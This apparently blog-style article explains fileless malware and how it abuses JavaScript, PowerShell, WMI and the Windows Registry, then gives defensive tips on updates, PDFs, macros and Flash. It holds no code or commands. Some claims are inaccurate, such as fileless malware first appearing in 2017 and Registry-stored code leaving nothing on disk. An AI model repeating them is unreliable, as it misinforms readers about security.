Fileless malware can quickly gain full access to network, computer and even browser activity (including login credentials) without the victim knowing.

The Rise of Fileless Malware

Many of the early infectious programs that we now know as Malware were initially written as experiments or pranks.  With the expansion of broadband internet, these infectious programs became more
frequently designed for profit.  Since the late 1990’s, many widespread computer viruses, trojans and worms have been designed to take control of end users’ computers to steal business, personal,
and financial information.  In recent years, these infections have evolved into ransomware, spyware, click fraud, and distributed denial-of-service attacks used for profit and sabotage.

Malware is typically spread by an executable program being copied onto the victim’s computer.  The executable file is typically disguised in an infected file attachment such as a Word document, PDF or JPEG,
but can also be spread by external media devices, mobile phones and browser “drive by” attacks.    Once the malware is executed the instructions of the file are loaded into the machines memory, where it can be used to download additional malware or “phone home” to the people that are controlling it.  The actual operation of the installation is managed by a separate program which involves a file and writing to the hard disk of the computer.  It is that active process that causes the damage and leaves infection “residue” on the host system’s hard drive, even when attempting to avoid detection. 

The Difference Between Malware and Fileless Malware

Fileless malware first appeared in 2017.  Evolving from successful malware techniques, fileless malware aims to never have its content written to the infected computer’s hard drive. Fileless Malware doesn’t involve a second program downloaded by an installer. Instead, it loads directly into memory as system commands, runs immediately and causes trusted programs installed on the machine to perform maliciously – often continuing to run until the host device is powered down completely. One of the most common methods of delivering a fileless malware attack is though webpages.  Since HTML, the formatting
language used to create websites, does not have programming capabilities several scripting languages such as JavaScript were developed to enable program functions within webpages.

The JavaScript that creates fileless malware calls on Windows PowerShell and gives it a series of commands.  Each command executes in the machine memory.  Once the commands have been run, the JavaScript shuts the PowerShell window leaving no trace that a script was run.  Although the code for the web page will be stored on the disk temporarily while it loads into the browser, when that web page is closed, the code that created it is wiped out.

The code for fileless malware is not stored in a file nor installed on the victim’s machine, instead it writes its script into the Registry of Windows, a function of the Windows Operating System that launches programs on startup or on a schedule.  Since it does not write any part of its activity to the computer's hard drive, it is very resistant to existing security strategies that incorporate file-based whitelisting,
signature detection, hardware verification, pattern-analysis, time-stamping, etc., and leaves very little by way of evidence that could be used by digital forensic investigators to identify fraudulent activity following a data breach or security incident.

The response to fileless malware attacks hasn’t come from the anti-malware industry.  The targeting of Windows’ services to execute these attacks caused Microsoft to respond with a fix.

Avoiding Fileless Malware Attacks

Defense against any type of malware begins with keeping your software up to date.  Microsoft has been very effective in blocking the exploitation of PowerShell and WMI, so insuring Windows machines are up to
date should be a priority.

Disable the ability for PDF’s to load in browsers and your PDF readers from enabling JavaScript.  The malicious code of a fileless malware attack leaves no trace of its existence once the PDF viewing tab in the browser is closed.  If a PDF is downloaded before it is opened, your firewall has a chance to spot any malicious code it contains, and the file is available for analysis later.

Despite JavaScript being a channel for fileless malware, disabling it is not recommended.  Not only will webpages you visit be missing elements or blank, but there is also a JavaScript translator
within Windows that can be called from within a webpage without JavaScript.

Microsoft Office software has macros turned off by default, but it is still important to remind employees not to enable macros in attachments.  Although Office macros are not a main vector for fileless attacks, the availably to view Office documents online in a browser creates the opportunity to run macros and launch calls to PowerShell or WMI.

Disable Flash for video viewing.  On most websites Flash has been replaced with HTML5. Chrome and Firefox both provide the option to block Flash.  In Internet Explorer, disabling ActiveX
prevents flash from loading.  Microsoft Edge will not accept any Flash code.